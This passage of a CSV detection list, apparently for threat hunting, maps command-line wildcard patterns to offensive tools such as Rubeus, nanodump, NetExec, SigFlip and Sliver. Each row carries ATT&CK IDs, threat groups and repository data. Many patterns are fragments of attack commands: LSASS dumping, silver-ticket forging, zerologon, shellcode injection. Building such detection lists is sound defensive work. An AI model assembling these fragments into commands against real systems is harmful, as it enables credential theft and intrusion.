+"* -sharpweb -Command *","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation 
tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z"
+"* --shell tcsh exegol*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"* --shellcode *","offensive_tool_keyword","frampton","PE Binary Shellcode Injector - Automated code cave discovery. shellcode injection - ASLR bypass - x86/x64 compatible","T1055 - T1548.002 - T1129 - T1001","TA0002 - TA0003- TA0004 -TA0011","N/A","N/A","POST Exploitation tools","https://github.com/ins1gn1a/Frampton","1","1","N/A","N/A","1","69","16","2019-11-24T22:34:48Z","2019-10-29T00:22:14Z"
+"* --shellcode *--dc-ip *","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10",,"N/A",,,
+"* --shellcode *--silent*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10",,"N/A",,,
+"* --shellcode --remoteinject*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10",,"N/A",,,
+"* shodan-api.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* --show passwd*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"* --show_invalid_creds*","offensive_tool_keyword","Spray365","Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/MarkoH17/Spray365","1","0","N/A","N/A","3","296","53","2022-07-14T14:45:57Z","2021-11-04T18:20:39Z"
+"* --shtinkering*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z"
+"* sigflip.*","offensive_tool_keyword","C2 related tools","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"* sigflip.c *","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"* SigFlip.exe*","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"* SigFlip.PE*","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"* sigflip.x64.*","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"* sigflip.x86.*","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"* SigLoader *","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"* --sign-domain *","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"* --sign-steal *","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"* Sigwhatever*","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - 
T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","0","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" +"* --silent -obf NixImports -o /tmp/*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10",,"N/A",,, +"* --silent-process-exit *","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"* silenttrinity.*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. 
Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","0","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" +"* silver * /domain*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* silver * /ldap *","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* silver * /passlastset *","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* silver * /service:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* --single shadow.hashes*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* sip-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* sip-call-spoof.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* sip-enum-users.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* sip-log4shell.nse*","offensive_tool_keyword","nmap","Nmap NSE scripts to check against log4shell or LogJam vulnerabilities (CVE-2021-44228). NSE scripts check most popular exposed services on the Internet. It is basic script where you can customize payload. Nmap (Network Mapper) is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/Diverto/nse-log4shell","1","0","N/A","N/A","4","347","51","2021-12-20T15:34:21Z","2021-12-12T22:52:02Z" +"* sip-methods.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* sitadel.py*","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/shenril/Sitadel","1","0","N/A","N/A","6","516","111","2020-01-21T14:59:40Z","2018-01-17T09:06:24Z" +"* -SiteListFilePath * -B64Pass *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. 
While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Get-System.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* --skip-crawl*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","0","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" +"*- --skippasswordcheck*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - 
TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" +"* --skipregistryloggedon*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" +"* skypev2-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* sliver sliver*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"* smb * --dpapi *password*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* smb * --gen-relay-list *.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability 
checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* smb * --lsa --log *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* smb * -M lsassy*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* smb * -M masky -o CA=*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* smb * -M msol *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* smb * -M ntlmv1 
*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* smb * -M rdp -o ACTION=enable*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* smb * -M runasppl*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* smb * -M zerologon*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* smb * --ntds --log 